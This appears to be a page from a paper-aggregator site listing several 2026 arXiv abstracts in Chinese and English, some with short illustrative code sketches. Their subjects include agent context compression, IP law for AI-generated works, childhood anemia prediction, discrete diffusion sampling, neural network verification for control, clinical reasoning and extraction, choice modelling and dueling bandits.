广泛用于通用LM上下文的token级抽取式压缩器在结构上不适合LLM智能体:在跨越两个独立token级方法家族的17个(环境、骨干、方法)单元中,尽管实现了1.3-13.3倍的压缩,每个单元的均值奖励≤0.05。我们将这种失败模式命名为动作语法破坏——携带动作语义的token(标识符、括号、动作动词)正是那些自信息排名最低的token,因此通用压缩器可靠地移除它们,环境拒绝剩余部分。诊断指向步骤粒度压缩。我们引入AGORA,一种无推理的步骤级压缩器,结合结构提示解析器、格式和时效关键内容的始终保留底线,以及一个在反事实下一步动作变化标签上训练的125M参数相关性评分器(约2ms/步,零每步LLM开销)。在比较的无推理和基于LLM的方法中,AGORA是唯一在9个单元中的8个中保持≥75%无压缩性能的方法(唯一的例外为73%);四路组件消融将结构底线隔离为主要的性能杠杆,而学习到的评分器是单一固定保留比率下实现1.0-11.5倍自适应端到端压缩的来源。

英文摘要

The token-level extractive compressors widely used for general LM context are structurally inappropriate for LLM agents: across 17 (env, backbone, method) cells spanning two independent token-level method families, every cell collapses to mean reward <= 0.05 despite 1.3-13.3x realized compression. We name and characterize this failure mode as action-grammar destruction: the tokens carrying action semantics (identifiers, brackets, action verbs) are exactly those that self-information ranks lowest, so a general-purpose compressor reliably removes them and the environment rejects the residual. The diagnosis points to step-granularity compression. We introduce AGORA, an inference-free step-level compressor combining a structural prompt parser, an always-keep floor for format- and recency-critical content, and a 125M-parameter relevance scorer trained on counterfactual next-action-change labels (~2ms/step, zero per-step LLM toll). Across the compared inference-free and LLM-based methods, AGORA is the only one retaining >= 75% uncompressed performance in 8 of 9 cells (with the lone exception at 73%); a four-way component ablation isolates the structural floor as the dominant quality lever and the learned scorer as the source of 1.0-11.5x adaptive end-to-end compression from a single fixed keep ratio.
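
The combination of an always-keep floor and a relevance scorer can be sketched at step granularity as below. This is a simplified illustration, not AGORA's implementation: the function name and the `is_critical` predicate are hypothetical, and the relevance scores are passed in as plain numbers rather than produced by the 125M-parameter scorer.

```python
import math


def compress_steps(steps, scores, keep_ratio=0.5, recent_k=1, is_critical=None):
    """Keep whole steps: a mandatory floor first, then the top-scored rest."""
    n = len(steps)
    if n == 0:
        return []
    if is_critical is None:
        is_critical = lambda step: False

    # Floor: the most recent steps and anything flagged format-critical.
    keep = set(range(max(n - recent_k, 0), n))
    keep |= {i for i, step in enumerate(steps) if is_critical(step)}

    # Fill up to the keep ratio with the highest-scored remaining steps.
    target = max(math.ceil(keep_ratio * n), len(keep))
    ranked = sorted((i for i in range(n) if i not in keep),
                    key=lambda i: scores[i], reverse=True)
    keep.update(ranked[: target - len(keep)])

    # Preserve the original order so the trajectory still reads in sequence.
    return [steps[i] for i in sorted(keep)]


history = ["FORMAT: act[arg]", "obs: shelf is empty", "obs: door is open", "obs: key on table"]
scores = [0.0, 0.9, 0.1, 0.2]
print(compress_steps(history, scores, keep_ratio=0.75,
                     is_critical=lambda s: s.startswith("FORMAT")))
```

Because steps are kept or dropped whole, the action syntax inside a retained step is never broken apart, which is the property that token-level pruning loses according to the abstract.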

2605.26590 2026-05-27 cs.CY cs.AI 版本更新

Examining the Challenges of Intellectual Property in AI-Generated Productions

审视人工智能生成作品中的知识产权挑战

Ali Mazhar, Mohammad Zare, Marjan Veysi

AI总结 本文通过比较伊朗、欧盟、英国和美国的法律框架,分析人工智能生成作品在知识产权保护中的所有权归属与法律挑战,并提出修订法律或引入新型权利的建议。

详情
Journal ref
New Researches in the Smart City, Vol. 3, No. 4, Summer 2025
AI中文摘要

随着能够自主生成艺术、文学、音乐作品甚至发明而无需直接人工干预的人工智能系统的进步,知识产权制度面临前所未有的问题和挑战。最关键的问题涉及在缺乏人类创作者的情况下道德和经济权利的所有权,以及如何为这些产出提供法律保护。本文首先回顾了这一领域的理论基础和现有文献,然后比较研究了伊朗的法律框架,如1969年《作者、作曲家和艺术家权利保护法》和《专利和商标注册法》,以及其他法律体系,包括欧盟、英国和美国。此外,还分析了关于人工智能生成作品知识产权的现有法律观点及相关执法挑战。研究结果揭示了当前伊朗法律框架内的重大监管空白。为了在促进创新与保护人类创造力之间取得平衡,修订现有法律并引入新方法,例如为人工智能生成作品定义特定的知识产权或指定相关人类代理人之间的所有权,似乎是必要的。

英文摘要

With the advancement of artificial intelligence systems capable of autonomously generating artistic, literary, and musical works, and even inventions, without direct human intervention, the intellectual property (IP) regime faces unprecedented questions and challenges. The most critical issue concerns the ownership of moral and economic rights in the absence of a human creator, and how such outputs can be granted legal protection. This paper first reviews the theoretical foundations and existing literature in this domain, then comparatively examines Iranian legal frameworks, such as the 1969 Law for the Protection of Authors, Composers, and Artists' Rights and the Patent and Trademark Registration Law, alongside other legal systems, including those of the European Union, the United Kingdom, and the United States. Furthermore, existing legal perspectives on the intellectual property of AI-generated works and the related enforcement challenges are analyzed. The findings reveal significant regulatory gaps within the current Iranian legal framework. To balance the promotion of innovation with the preservation of human creativity, revising existing laws and introducing novel approaches, such as defining a specific intellectual property right for AI-generated works or designating ownership among associated human agents, appear to be essential.

2605.26589 2026-05-27 cs.LG cs.AI stat.ML 版本更新

Few-shot Cross-country Generalization of Tabular Machine Learning and Foundation Models for Childhood Anemia Prediction under Distribution Shift

分布漂移下儿童贫血预测的表格机器学习与基础模型的少样本跨国家泛化

Yusuf Brima, Marcellin Atemkeng, Lansana Hassim Kallon, David Niyukuri, Antoine Vacavant, Samuel Saidu, Ding-Geng Chen

发表机构 * Department of Mathematics, Rhodes University, South Africa(数学系,罗德斯大学,南非) National Institute for Theoretical and Computational Sciences (NITheCS), Stellenbosch, 7600, South Africa(国家理论与计算科学研究所(NITheCS),斯泰伦博斯,7600,南非) Interdisciplinary Research Program in Public Health, University of Burundi, Burundi(公共卫生跨学科研究计划,布隆迪大学,布隆迪) Université Clermont Auvergne, Clermont Auvergne INP, CNRS, Institut Pascal, Clermont-Ferrand, France(克莱蒙奥弗涅大学,克莱蒙奥弗涅INP,CNRS,帕斯卡研究所,克莱蒙费朗,法国) Department of International Public Health, Liverpool School of Tropical Medicine, Liverpool, UK(国际公共卫生系,利物浦热带医学院,利物浦,英国) College of Health Solutions, Arizona State University, Phoenix, USA(健康解决方案学院,亚利桑那州立大学,凤凰城,美国) Department of Statistics, University of Pretoria, Pretoria, South Africa(统计系,比勒陀利亚大学,比勒陀利亚,南非)

AI总结 本研究评估了基于Transformer的表格基础模型TabPFN在跨国家、数据稀缺环境下预测儿童贫血的性能,发现其优于经典监督方法,尤其在低数据场景下表现出更好的区分度和校准能力。

详情
AI中文摘要

儿童贫血影响全球约40%的6-59个月儿童,且由异质性因素引起,限制了模型的泛化能力。我们在跨国家和数据稀缺环境下,评估了基于Transformer的表格基础模型与经典监督方法。我们使用了来自非洲、亚洲、拉丁美洲、高加索和中东16个国家的DHS数据(n=68,856)。比较了逻辑回归、XGBoost、LightGBM和TabPFN v2.6。性能通过AUC-ROC、Brier评分和ECE评估。泛化性通过留一国家法(LOCO)、反向LOCO和少样本设置评估。亚组分析包括性别、年龄、居住地、母亲教育和财富。特征重要性通过SHAP估计。TabPFN在低数据场景(<200样本)中优于经典模型,显示出更高的区分度和更好的校准。在各国中,它实现了最低的Brier评分(0.042)和ECE(0.203)。在全数据设置下,AUC-ROC范围为0.59-0.76,模型间差异较小(≤0.05)。LOCO性能稳定(0.58-0.69),受国家背景驱动。反向LOCO显示出不对称的可转移性。亚组性能一致,无系统性人口统计偏差。SHAP识别出儿童年龄、海拔和年龄别身高Z分数为主要预测因子,其次是财富和母亲教育。儿童贫血预测的性能更多由人群变异驱动而非模型选择。TabPFN在低资源环境中通过改进的区分度和校准提供了优势,突显了基础模型作为数据稀缺全球健康预测的有前景工具。

英文摘要

Childhood anemia affects around 40% of children aged 6-59 months globally and arises from heterogeneous factors, limiting model generalizability. We evaluate a transformer-based tabular foundation model against classical supervised methods under cross-country and data-scarce settings. We used DHS data from 16 countries across Africa, Asia, Latin America, the Caucasus, and the Middle East (n=68,856). We compared Logistic Regression, XGBoost, LightGBM, and TabPFN v2.6. Performance was assessed using AUC-ROC, Brier score, and ECE. Generalization was evaluated using leave-one-country-out (LOCO), reverse-LOCO, and few-shot settings. Subgroup analyses included sex, age, residence, maternal education, and wealth. Feature importance was estimated using SHAP. TabPFN outperformed classical models in low-data regimes (<200 samples), showing higher discrimination and better calibration. Across countries, it achieved the lowest Brier score (0.042) and ECE (0.203). Under full-data settings, AUC-ROC ranged from 0.59-0.76 with small between-model differences ($\leq 0.05$). LOCO performance was stable (0.58-0.69), driven by country context. Reverse-LOCO showed asymmetric transferability. Subgroup performance was consistent with no systematic demographic bias. SHAP identified child age, altitude, and height-for-age z-score as dominant predictors, followed by wealth and maternal education. Performance in childhood anemia prediction is driven more by population variation than model choice. TabPFN provides advantages in low-resource settings through improved discrimination and calibration, highlighting foundation models as promising tools for data-scarce global health prediction.
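
The two calibration metrics reported in this abstract, the Brier score and the expected calibration error (ECE), can be computed as in the sketch below. It assumes binary labels, predicted probabilities of the positive class, and equal-width bins; the bin count of 10 is a common default chosen here for illustration, not a setting taken from the study.

```python
def brier_score(probs, labels):
    """Mean squared difference between predicted probability and 0/1 outcome."""
    return sum((p - y) ** 2 for p, y in zip(probs, labels)) / len(probs)


def expected_calibration_error(probs, labels, n_bins=10):
    """Weighted mean gap between average prediction and observed rate per bin."""
    bins = [[] for _ in range(n_bins)]
    for p, y in zip(probs, labels):
        idx = min(int(p * n_bins), n_bins - 1)  # p == 1.0 goes in the last bin
        bins[idx].append((p, y))

    n = len(probs)
    ece = 0.0
    for members in bins:
        if members:
            mean_pred = sum(p for p, _ in members) / len(members)
            observed = sum(y for _, y in members) / len(members)
            ece += len(members) / n * abs(observed - mean_pred)
    return ece


probs = [0.8, 0.8, 0.1, 0.1]
labels = [1, 0, 0, 0]
print(brier_score(probs, labels), expected_calibration_error(probs, labels))
```

Both metrics are lower-is-better. The Brier score mixes discrimination and calibration, while ECE isolates how far predicted risks sit from observed frequencies.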

2605.26582 2026-05-27 cs.LG cs.AI 版本更新

On the Error-Correcting Effects of Stochasticity in Discrete Diffusion

离散扩散中随机性的纠错效应

William Yuan, Sungwon Jeong, Amirali Aghazadeh

发表机构 * Georgia Institute of Technology(佐治亚理工学院)

AI总结 本文系统研究离散扩散模型中马尔可夫转移随机性程度对采样效率与质量的权衡,提出离散搅动与重启采样(DCRS)算法,通过交替正向和反向扩散过程注入受控随机性,在低函数评估次数下改善速度-质量权衡。

详情
AI中文摘要

离散扩散模型在文本和图像生成中取得了强劲性能,但其推理仍然缓慢,且必须内在平衡采样效率与样本质量。在这项工作中,我们系统研究了马尔可夫转移中随机性程度如何主导采样权衡。我们表明,高度确定性的转移收敛迅速但遭受误差累积,而更随机的转移收敛更慢但能达到更高的最终样本质量。通过信息论分析,我们识别出潜在机制为一种由对称地在状态间交换质量的冗余转移诱导的纠错效应,并表明这些转移可证明地收缩采样误差。受此分析启发,我们提出离散搅动与重启采样(DCRS),一种新颖的推理算法,通过交替正向和反向扩散过程注入受控随机性。在合成数据集和大规模基准上的实验表明,DCRS在低函数评估次数下改善了速度-质量权衡。在图像数据集上,与标准采样器相比,DCRS在保持竞争性样本质量的同时,实现了高达10倍的采样步数减少;而在语言基准上,我们观察到更细微的行为,取决于损坏过程和采样程序。

英文摘要

Discrete diffusion models achieve strong performance in text and image generation, but their inference remains slow and must inherently balance sampling efficiency and sample quality. In this work, we present a systematic study of how the degree of stochasticity in Markov transitions governs the sampling tradeoff. We show that highly deterministic transitions converge rapidly but suffer from error accumulation, while more stochastic transitions converge more slowly yet can achieve higher final sample quality. Using an information-theoretic analysis, we identify the underlying mechanism as an error-correcting effect induced by redundant transitions that symmetrically exchange mass between states, and show that these transitions can provably contract sampling errors. Motivated by this analysis, we propose Discrete Churn and Restart Sampling (DCRS), a novel inference algorithm that injects controlled stochasticity by alternating between forward and reverse diffusion processes. Experiments on synthetic datasets and large-scale benchmarks show that DCRS improves the speed-quality tradeoff in the regime of few function evaluations. On image datasets, DCRS achieves up to a $10\times$ reduction in sampling steps compared to standard samplers while maintaining competitive sample quality, whereas on language benchmarks, we observe more nuanced behavior depending on the corruption process and sampling procedure.

2605.26577 2026-05-27 eess.SY cs.AI cs.LG cs.SY math.OC 版本更新

Bridging Control with Neural Network Verifier alpha-beta-CROWN: A Tutorial

桥接控制与神经网络验证器 alpha-beta-CROWN:教程

Haoyu Li, Xiangru Zhong, Hao Cheng, Bin Hu, Huan Zhang

发表机构 * Department of Computer Science(计算机科学系) Department of Electrical and Computer Engineering(电气与计算机工程系)

AI总结 本教程提出一个统一框架,通过将控制问题与神经网络验证器 α,β-CROWN 桥接,实现控制器属性的可扩展形式验证。

Comments ACC 2026 Tutorial

详情
AI中文摘要

基于学习的控制器合成方法因其高表达力和强经验性能而受到欢迎。然而,在自动驾驶、机器人技术和电力系统等安全关键场景中,仅凭经验性能是不够的,对控制器的稳定性、安全性等属性进行形式验证是非常可取的。不幸的是,许多先前的验证方法要么依赖于系统或证书的特定结构假设,难以在不同设置间迁移,要么在高维神经网络系统上可扩展性差。在本教程中,我们提出了一个统一框架,旨在通过将控制与最先进的神经网络验证器 α,β-CROWN(alpha-beta-CROWN)桥接来弥合这一差距。其核心是,α,β-CROWN 是一个通用的边界引擎,用于表示为计算图的非线性函数:给定一个输入域,它可以产生认证边界和非线性函数的显式线性松弛。这些认证边界本身对于可达性分析等任务很有用,并且它们为执行可满足性检查和优化的更复杂例程提供了基础。更具体地说,许多控制问题归结为验证状态域上的实值不等式(例如,李雅普诺夫理论)。因此,α,β-CROWN 通过计算紧边界并基于边界递归划分和剪枝子域,实现了这些条件的可扩展验证。得益于 GPU 并行化,该流程在对传统方法具有挑战性的验证和优化问题上展示了卓越的可扩展性。在本教程中,我们讨论了 α,β-CROWN 的基础知识,并介绍了其在各种控制相关任务中的应用。

英文摘要

Learning-based methods for synthesizing controllers have gained popularity due to their high expressiveness and strong empirical performance. However, in safety-critical scenarios such as autonomous driving, robotics, and power systems, empirical performance alone is insufficient, and formal verification of controller properties such as stability and safety is highly desirable. Unfortunately, many prior verification approaches are either tied to specific structural assumptions on the system or the certificate, making them difficult to transfer across settings, or suffer from poor scalability on higher-dimensional neural network systems. In this tutorial, we present a unified framework that aims to close this gap by bridging control with the state-of-the-art neural network verifier α,β-CROWN (alpha-beta-CROWN). At its core, α,β-CROWN is a general-purpose bounding engine for nonlinear functions represented as computation graphs: given an input domain, it can produce certified bounds and explicit linear relaxations of the nonlinear function. These certified bounds are useful on their own for tasks such as reachability analysis, and they also provide the foundation for more complex routines that perform satisfiability checking and optimization. More specifically, many control problems reduce to verifying real-valued inequalities over a state domain (e.g., Lyapunov theory). Consequently, α,β-CROWN enables scalable verification of such conditions by computing tight bounds and recursively partitioning and pruning subdomains based on the bounds. Thanks to GPU parallelization, this pipeline demonstrates superior scalability on verification and optimization problems that are challenging for traditional approaches. In this tutorial, we discuss the basics of α,β-CROWN and introduce its application to various control-related tasks.
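
The bound-then-split loop described in this abstract (compute a certified bound, prune subdomains where the inequality is already proven, partition the rest) can be illustrated on a one-dimensional toy problem. The sketch below uses plain interval arithmetic on a hand-picked function rather than the linear relaxations that α,β-CROWN computes, and it does not call the α,β-CROWN library; all names are hypothetical.

```python
def square_lower(lo, hi):
    """Sound lower bound of x**2 over the interval [lo, hi]."""
    if lo <= 0.0 <= hi:
        return 0.0
    return min(lo * lo, hi * hi)


def lower_bound(lo, hi):
    """Sound (but loose) lower bound of f(x) = x**2 - x + 1 over [lo, hi]."""
    return square_lower(lo, hi) - hi + 1.0


def verify_positive(lo, hi, min_width=1e-6):
    """Try to certify f(x) > 0 on [lo, hi] by branch and bound.

    Returns (True, n) if every subdomain was certified, or (False, n) if a
    subdomain shrank below min_width without a proof (inconclusive).
    n is the number of subdomains examined.
    """
    stack = [(lo, hi)]
    examined = 0
    while stack:
        a, b = stack.pop()
        examined += 1
        if lower_bound(a, b) > 0.0:
            continue                      # certified here, prune this subdomain
        if b - a < min_width:
            return False, examined        # cannot split further
        mid = 0.5 * (a + b)
        stack.extend([(a, mid), (mid, b)])
    return True, examined


print(verify_positive(-2.0, 2.0))
```

On the full interval the bound is too loose to prove anything, but it tightens as subdomains shrink, so the property is certified after a handful of splits. A Lyapunov-style condition would follow the same pattern over a multi-dimensional state box, with tighter relaxations reducing how much splitting is needed.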

2605.26567 2026-05-27 cs.AI 版本更新

MedGuideX: Internalizing Decision Logic from Executable Guidelines into Large Language Models for Clinical Reasoning

MedGuideX: 将可执行指南中的决策逻辑内化到大型语言模型中以进行临床推理

Yuhao Shen, Lang Cao, Simo Du, Yuqing Wang, Juexiao Zhou, Hao Peng, Yue Guo

发表机构 * University of Illinois Urbana-Champaign(伊利诺伊大学厄巴纳-香槟分校) The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)) Albert Einstein College of Medicine(爱因斯坦医学院)

AI总结 提出一种将临床实践指南转化为可执行决策逻辑并生成事实与反事实问答数据的训练流程,通过微调医学大语言模型得到MedGuideX,在四个临床推理基准上平均准确率相对提升10.28%,且医生评估显示其推理步骤更优。

详情
AI中文摘要

临床实践指南(CPGs)编码了基于证据的决策逻辑,临床医生通过评估患者变量、条件标准和推荐规则来应用这些逻辑。然而,现有方法通常将CPGs作为自由文本训练数据或检索源,未能充分利用其程序性决策结构。为了更好地利用这种结构,我们引入了一个基于指南的训练流程,将CPG推荐转化为可执行的临床决策逻辑,并利用它生成事实性和反事实性的问答数据。这些数据教会模型既支持指南推荐的决策,也了解在不同患者条件下决策如何变化。在生成的医学数据上对医学大语言模型进行后训练,得到MedGuideX。在四个临床推理基准上,MedGuideX的平均准确率相对提高了10.28%。医生评估进一步表明,MedGuideX能更好地恢复临床医生撰写的推理步骤,并在忠实性、有效性、完整性和清晰度方面产生医生偏好的推理依据。总体而言,我们的结果表明,来自CPGs的可执行决策逻辑可以转化为可扩展的监督信号,用于构建可靠的医学大语言模型。

英文摘要

Clinical practice guidelines (CPGs) encode evidence-based decision logic that clinicians apply by evaluating patient variables, conditional criteria, and recommendation rules. However, existing methods often use CPGs as free-text training data or retrieval sources, underutilizing their procedural decision structure. To better exploit this structure, we introduce a guideline-derived training pipeline that transforms CPG recommendations into executable clinical decision logic and uses it to generate factual and counterfactual question-answering data. These data teach models both guideline-supported decisions and how decisions change under different patient conditions. Post-training a medical LLM on the generated data yields MedGuideX. Across four clinical reasoning benchmarks, MedGuideX achieves a 10.28% relative improvement in average accuracy. Physician evaluation further shows that MedGuideX better recovers clinician-authored reasoning steps and produces physician-preferred rationales in faithfulness, validity, completeness, and clarity. Overall, our results show that executable decision logic from CPGs can be transformed into scalable supervision for building reliable medical LLMs.

2605.26560 2026-05-27 cs.CL cs.AI 版本更新

Reliable Extraction of Clinical Follow-Up Instructions: A Hybrid Neural-Symbolic Pipeline

可靠提取临床随访指令:一种混合神经符号管道

Michal Laufer, Yehudit Aperstein, Alexander Apartsin

发表机构 * Bar-Ilan University(巴伊兰大学) Afeka College of Engineering(阿菲卡工程学院) Holon Institute of Technology(霍洛恩理工学院)

AI总结 提出混合神经符号管道,结合BioBERT实体提取和确定性日期算术,在合成门诊笔记上实现接近完美的(动作, 日期)对提取F1分数,优于直接生成方法。

Comments 17 pages, 5 figures

详情
AI中文摘要

目标。门诊笔记携带随访指令,将动作与未来时间配对(“两周内进行脑部MRI”)。提取(动作,日期)对支持调度和审计,但生成式提取器会错过日期,因为链接和算术在解码中是隐式的。我们测试了一种混合神经符号管道与直接生成方法的对比。方法。我们定义了TestSpecification和TimeSpecification实体以及ScheduledFor关系。BioBERT提供BIO标注和双仿射链接器;实体通过28动作本体规范化,时间通过确定性方式归一化为天数偏移。我们在一个包含2000份笔记的合成门诊语料库上评估,采用动作不相交划分(18个训练,6个OOV测试),与零样本GPT-4o-mini和LoRA微调LLaMA-3 8B对比,使用笔记级bootstrap 95%置信区间。结果。在259份笔记的已知和OOV划分上,混合管道实现了测试时间对F1分别为0.997和0.986,MAE为0.00天。基线达到了高动作F1(LLaMA-3 0.992;GPT-4o-mini 0.963已知),但对F1保持在0.51-0.57(LLaMA-3)和0.53(GPT-4o-mini),置信区间与混合管道不重叠。结论。将学习的实体提取与确定性日期算术分离在此基准上优于生成方法,泛化到未见动作,并暴露了失败模式。迁移到真实电子健康记录笔记是下一步验证;初步的现实性检查见局限性。

英文摘要

Objective. Outpatient notes carry follow-up instructions pairing actions with future times ("MRI brain in two weeks"). Extracting (action, date) pairs supports scheduling and audit, but generative extractors miss the date because linking and arithmetic are implicit in decoding. We test a hybrid neural-symbolic pipeline against direct generation. Methods. We define TestSpecification and TimeSpecification entities and a ScheduledFor relation. BioBERT feeds BIO tagging and a biaffine linker; entities are canonicalized via a 28-action ontology and times normalized to day offsets deterministically. We evaluate on a 2,000-note synthetic outpatient corpus with action-disjoint splits (18 train, 6 OOV-test) against zero-shot GPT-4o-mini and LoRA-fine-tuned LLaMA-3 8B with note-level bootstrap 95% CIs. Results. On 259-note seen and OOV splits the hybrid pipeline achieves Test-Time Pair F1 of 0.997 and 0.986 with 0.00-day MAE. Baselines reach high action F1 (LLaMA-3 0.992; GPT-4o-mini 0.963 seen) but Pair F1 stays at 0.51-0.57 (LLaMA-3) and 0.53 (GPT-4o-mini), CIs non-overlapping with the hybrid. Conclusion. Separating learned entity extraction from deterministic date arithmetic outperforms generation on this benchmark, generalizes to held-out actions, and exposes failure modes. Transfer to real EHR notes is the next validation; a first-pass realism check is in Limitations.
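
The deterministic step of this pipeline, turning an extracted time expression into a day offset, can be sketched with a small rule-based normalizer. The pattern, the number-word table, and the conventions of 30 days per month and 365 days per year are assumptions made for this illustration; the abstract does not state the paper's actual normalization rules.

```python
import re

# Assumed conventions for this sketch only.
_NUMBER_WORDS = {"a": 1, "an": 1, "one": 1, "two": 2, "three": 3, "four": 4,
                 "five": 5, "six": 6, "seven": 7, "eight": 8, "nine": 9,
                 "ten": 10, "twelve": 12}
_UNIT_DAYS = {"day": 1, "week": 7, "month": 30, "year": 365}
_PATTERN = re.compile(
    r"\b(?:in\s+)?(\d+|[a-z]+)\s+(day|week|month|year)s?\b", re.IGNORECASE)


def to_day_offset(text):
    """Return the offset in days for the first '<quantity> <unit>' phrase.

    Returns None when no phrase is found or the quantity word is unknown.
    """
    match = _PATTERN.search(text)
    if match is None:
        return None
    quantity_raw = match.group(1).lower()
    unit = match.group(2).lower()
    if quantity_raw.isdigit():
        quantity = int(quantity_raw)
    else:
        quantity = _NUMBER_WORDS.get(quantity_raw)
    if quantity is None:
        return None
    return quantity * _UNIT_DAYS[unit]


print(to_day_offset("MRI brain in two weeks"))
```

Keeping the arithmetic in rules like these means a wrong date can be traced to a specific pattern or table entry, which is the kind of exposed failure mode the abstract contrasts with implicit arithmetic during decoding.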

2605.26559 2026-05-27 cs.LG cs.AI econ.EM 版本更新

Auditing and Fixing Economic Validity in Tabular Foundation Models for Discrete Choice

审计与修复离散选择中表格基础模型的经济有效性

Yingshuo Wang, Xian Sun, Yanhang Li, Zhichao Fan, Zexin Zhuang

发表机构 * University of California, Berkeley, CA, USA(加州大学伯克利分校) Duke University, Durham, NC, USA(杜克大学) Northeastern University, Boston, MA, USA(东北大学) University of Illinois Urbana-Champaign, IL, USA(伊利诺伊大学厄巴纳-香槟分校) Southern Methodist University, Dallas, TX, USA(南卫理公会大学)

AI总结 提出两阶段适配器,将表格基础模型预测嵌入效用最大化框架,在保证经济一致性的同时提升选择预测精度。

Comments 5 pages, 1 table. Accepted at the FMSD Workshop, ICML 2026

详情
AI中文摘要

表格基础模型在选择预测任务上取得了很高的准确率,但其预测常常违反这些任务所需的经济逻辑:提高价格有时会增加预测需求,隐含的支付意愿估计经常为负或不合理。我们提出了一种两阶段适配器,将基础模型预测嵌入效用最大化框架。在第一阶段,我们估计一个标准选择模型,其参数受经济理论约束。在第二阶段,我们冻结这些参数,并训练一个校正项,将基础模型的预测作为附加信息纳入。结果模型继承了基础模型的精度提升,同时保证了政策扰动下价格-需求的单调关系,并产生可解析计算的权衡指标。在两个交通数据集上,适配器在保持完美经济一致性的同时,相比标准logit模型恢复了高达13个百分点的准确率,这是原始基础模型或传统蒸馏都无法实现的。

英文摘要

Tabular foundation models achieve strong accuracy on choice prediction tasks, but their predictions often violate the economic logic those tasks require: raising a price sometimes increases predicted demand, and implied willingness-to-pay estimates are frequently negative or implausible. We propose a two-stage adapter that embeds foundation model predictions within a utility-maximization framework. In the first stage, we estimate a standard choice model whose parameters are constrained to obey economic theory. In the second stage, we freeze those parameters and train a correction term that incorporates the foundation model's predictions as additional information. The result is a model that inherits the foundation model's accuracy gains while guaranteeing monotonic price-demand relationships under policy perturbation and producing analytically computable trade-off measures. On two transportation datasets, the adapter recovers up to 13 percentage points of accuracy over a standard logit model while maintaining perfect economic consistency, something neither the raw foundation models nor conventional distillation achieve.
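
One way to picture the two-stage structure is a logit model whose price and time coefficients are forced negative, plus a frozen-parameter correction built from foundation-model probabilities. The sketch below is an interpretation, not the paper's method: it assumes the correction enters as a price-independent offset `gamma * log(fm_prob)`, which is one simple construction that preserves price monotonicity, and every name in it is hypothetical.

```python
import math


def softmax(utilities):
    """Numerically stable softmax over a list of utilities."""
    peak = max(utilities)
    exps = [math.exp(u - peak) for u in utilities]
    total = sum(exps)
    return [e / total for e in exps]


def choice_probs(prices, times, theta_price, theta_time, fm_probs=None, gamma=0.0):
    """Choice probabilities from sign-constrained utilities plus a correction."""
    beta_price = -math.exp(theta_price)   # negative for any real theta_price
    beta_time = -math.exp(theta_time)     # negative for any real theta_time
    utilities = []
    for j, (price, time) in enumerate(zip(prices, times)):
        u = beta_price * price + beta_time * time
        if fm_probs is not None:
            # Assumed stage-2 correction: an offset that does not depend on price.
            u += gamma * math.log(fm_probs[j])
        utilities.append(u)
    return softmax(utilities)


def value_of_time(theta_price, theta_time):
    """Money a traveller would pay to save one unit of time (beta_time / beta_price)."""
    return math.exp(theta_time) / math.exp(theta_price)


base = choice_probs([2.0, 3.0], [30.0, 20.0], 0.0, math.log(0.1), [0.6, 0.4], 0.5)
raised = choice_probs([2.5, 3.0], [30.0, 20.0], 0.0, math.log(0.1), [0.6, 0.4], 0.5)
print(base[0], raised[0])
```

Because the price coefficient is negative by construction and the correction does not move when a price changes, raising an alternative's price can only lower its predicted share, and the ratio of coefficients stays available in closed form.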

2605.26554 2026-05-27 cs.LG cs.AI 版本更新

Linear and Neural Dueling Bandits with Delayed Feedback

具有延迟反馈的线性与神经对决赌博机

Xiangyi Wang, Pingchen Lu, Jie Mao, Mingze Kong, Zhi Hong, Zhiyong Wang, Zhongxiang Dai

发表机构 * The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)) The Chinese University of Hong Kong(香港中文大学)

AI总结 针对随机延迟反馈下的上下文对决赌博机问题,提出线性(LDB-DF)和神经(NDB-DF)两种算法,通过将逆概率加权(IPW)机制直接融入损失函数实现无偏校正,并给出线性设置下O(d*sqrt(T))的遗憾界和神经设置下的次线性保证。

详情
AI中文摘要

上下文对决赌博机构成了基于偏好的决策制定的基石,在推荐系统和大语言模型对齐中有关键应用。然而,标准算法依赖于即时反馈的理想化假设,这一条件在现实场景(如提示优化)中经常被违反。这种设置带来了独特的理论挑战:与线性赌博机不同,对决赌博机估计量缺乏闭式解,使得标准加权技术的朴素适应产生偏差。为解决这一问题,我们形式化了具有随机延迟反馈的上下文对决赌博机问题,并提出了两种新颖算法:线性延迟反馈对决赌博机(LDB-DF)和神经延迟反馈对决赌博机(NDB-DF)。我们方法的核心是一种新颖的估计量,它将逆概率加权(IPW)机制直接集成到损失函数中,确保对延迟或缺失反馈的无偏校正。我们提供了全面的理论分析,为线性设置建立了O(d*sqrt(T))的遗憾界,并为神经设置建立了次线性保证。在模拟和真实数据集上的大量实验证明了我们提出方法的有效性。

英文摘要

Contextual dueling bandits form a cornerstone of preference-based decision-making, with critical applications in recommender systems and large language model alignment. However, standard algorithms rely on the idealized assumption of immediate feedback, a condition frequently violated in real-world scenarios such as prompt optimization. This setting introduces a unique theoretical challenge: unlike linear bandits, dueling bandit estimators lack closed-form solutions, rendering naive adaptations of standard weighting techniques biased. To address this, we formalize the problem of Contextual Dueling Bandits with Stochastic Delayed Feedback and propose two novel algorithms: Linear (LDB-DF) and Neural (NDB-DF) Dueling Bandits with Delayed Feedback. Central to our approach is a novel estimator that integrates an Inverse Probability Weighting (IPW) mechanism directly into the loss function, ensuring unbiased correction for delayed or missing feedback. We provide comprehensive theoretical analysis, establishing an O(d*sqrt(T)) regret bound for the linear setting and sub-linear guarantees for the neural setting. Extensive experiments on both simulated and real-world datasets demonstrate the effectiveness of our proposed methods.
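To make the idea of placing inverse probability weights inside the loss concrete, here is a generic sketch of an IPW-weighted logistic (Bradley-Terry style) preference loss. It is not the estimator from the paper: the function name `ipw_dueling_loss`, the tuple layout of `duels`, the ridge term, and the assumption that each observation probability `p_obs` is known are all hypothetical choices made for illustration.

```python
import math

def ipw_dueling_loss(theta, duels, ridge=1.0):
    """Regularised logistic loss where each observed duel is weighted by 1 / p_obs.

    duels: list of (x_diff, y, observed, p_obs), where
      x_diff   = feature difference between the two arms (list of floats),
      y        = 1 if the first arm won, else 0,
      observed = whether the feedback has arrived yet,
      p_obs    = assumed probability that feedback has arrived by now.
    """
    loss = 0.5 * ridge * sum(t * t for t in theta)
    for x_diff, y, observed, p_obs in duels:
        if not observed:
            continue                      # delayed feedback contributes nothing yet
        z = sum(t * x for t, x in zip(theta, x_diff))
        nll = math.log1p(math.exp(z)) - y * z   # logistic negative log-likelihood
        loss += nll / p_obs               # up-weight to compensate for missing duels
    return loss

example = [
    ([1.0, 0.0], 1, True, 0.5),    # arrived; such duels arrive half the time
    ([0.0, 1.0], 0, False, 0.5),   # still delayed, so it is skipped
]
value = ipw_dueling_loss([0.0, 0.0], example)
```

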